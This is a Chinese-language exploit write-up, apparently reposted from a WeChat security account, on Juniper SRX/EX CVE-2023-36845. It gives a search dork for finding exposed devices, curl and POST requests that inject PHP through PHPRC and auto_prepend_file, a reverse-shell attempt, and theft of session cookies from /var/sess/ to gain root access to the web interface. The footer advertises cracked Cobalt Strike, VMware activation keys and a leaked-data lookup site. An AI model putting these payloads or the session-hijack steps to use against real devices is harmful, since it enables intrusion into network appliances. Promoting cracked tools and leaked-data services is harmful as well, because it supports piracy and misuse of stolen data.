2023年8月17日,Juniper 宣布了多个漏洞,包括:与防火墙 SRX 和 Switch EX 相关的 CVE-2023-36844、CVE-2023-36845、CVE-2023-36846、CVE-2023-36847、CVE-2023-36851
Juniper 表示,这些 CVE 的 CVSS 评分均为 5.3,如果组合在一起,该漏洞的 CVSS 评分可达 9.8;目前,我不知道 Juniper 是否更新了这些 CVE 的分数,因为事实上,我的以下 PoC 可以证明只有 1 个 CVE-2023-36845 可以进行 RCE,甚至接管系统的管理员权限。因此,仅此 CVE-2023-36845 就值得 CVSS 9.8 分!
zoomeye搜索语法:title:"Juniper Web Device Manager"
CVE 和 PoC 分析
谈到公开的 PoC,他们使用 CVE-2023-36846 上传可执行文件 test.php 和文件 php.ini。接下来,他们利用 CVE-2023-36845 更改 PHP 的 PHPRC 环境变量,以通过 php.ini 文件执行 test.php 文件。但其 RCE 仅止于执行 phpinfo() 和 LFI 函数读取部分内容,并不能提权或产生任何影响。
于是本地找了个环境进行测试,公开的脚本如下
https://github.com/kljunowsky/CVE-2023-36845
https://github.com/r3dcl1ff/CVE-2023-36844_Juniper_RCE
根据 PoC 发出以下 POST 请求:
POST /webauth_operation.php HTTP/1.1
Host: xxxxx
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
rs=do_upload&rsargs[]=[{"fileName": "test.txt", "fileData": ",aGk=", "csize": 2}]响应:
HTTP/1.1 200 OK
Date: Wed, 27 Sep 2023 11:28:38 GMT
Cache-Control: no-cache
ETag: "1ac3c-505-6103b62b"
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Wed, 27 Sep 2023 11:28:38 GMT
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
Content-Length: 23
-:function not callable竟然会报错 -:function not callable
使用 payload <? phpinfo(); ?> 测试:
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary
$'allow_url_include=1nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'过程:
POST request:
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 10.96.199.151
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 96
allow_url_include=1
auto_prepend_file="data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="发现响应为:
访问界面:
保存到本地:
执行 get_current_user() 的 payload
发现响应为:
但是用其他命令执行发现:
响应为:
竟然没有这些命令,那只能祭出大杀器:反弹shell!
尝试使用 /bin/bash 来 reverse_shell 但它不起作用:
监听:
发送 POST request 后,发现:
只能执行一些类似于 RCE 的基本命令。
那么为什么 root 用户不能执行这些基本命令呢?因为 Juniper 从版本 7.5 开始默认安装一个工具来限制此执行权限,即使它是 root 用户,因此为 Juniper 的开发团队整了个 Veriexec:
最后的最后,看到国外大佬研究成果:窃取登录用户的cookie登录web。在本地搜索源代码后,我发现 PHPSESSION 值位于 PHP 存储在 /var/sess/ 中的 cookie 中
/var/sess/:
那就用 glob() 读取 /var/sess/ 的文件列表吧!
POST response:
https 的话要使用 SECUREPHPSESSID
将文件名作为内容填充到 web 中:
刷新后:
当前是 root,超级用户:
还尝试了用来登录 ssh:
按照国外大佬的说法,此目录中会有 sess-… 文件,有的话可以登陆,没有就是不能登陆,因为源码中写的 session 超时 3600秒 ,一小时
但实际环境验证发现:
大多环境可能版本差异,并无法完美使用,可能需要更新的版本。目前次漏洞的利用算是进行了概念验证,奈何 Juniper 防控太强,能用的洞,也等于没用,欢迎大佬们讨论研究。
本文作者:耳旁有首歌原文地址:https://xz.aliyun.com/t/12892
关注公众号后台回复 0001 领取域渗透思维导图,0002 领取VMware 17永久激活码,0003 获取SGK地址,0004 获取在线ChatGPT地址,0005 获取 Windows10渗透集成环境,0006 获取 CobaltStrike 4.9.1破解版
加我微信好友,邀请你进交流群
往期推荐
对某金融App的加解密hook+rpc+绕过SSLPinning抓包
疑似境外黑客组织对CSDN、吾爱破解、bilibili等网站发起DDoS攻击
Fofa新产品 - 绕CDN溯源真实IP!
Cobalt Strike 4.8 正式发布上线!
团队在线Windows进程识别正式内测
突发!微信疑似存在RCE
记一次红队经历
WordPress Core RCE Gadget 分析
Apache ActiveMQ RCE 分析
域渗透之NTLM Relay
资源委派 (提权/横向移动)
备用号,欢迎关注
原文始发于微信公众号(刨洞安全团队):Juniper 新洞 CVE-2023-36845 浅析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论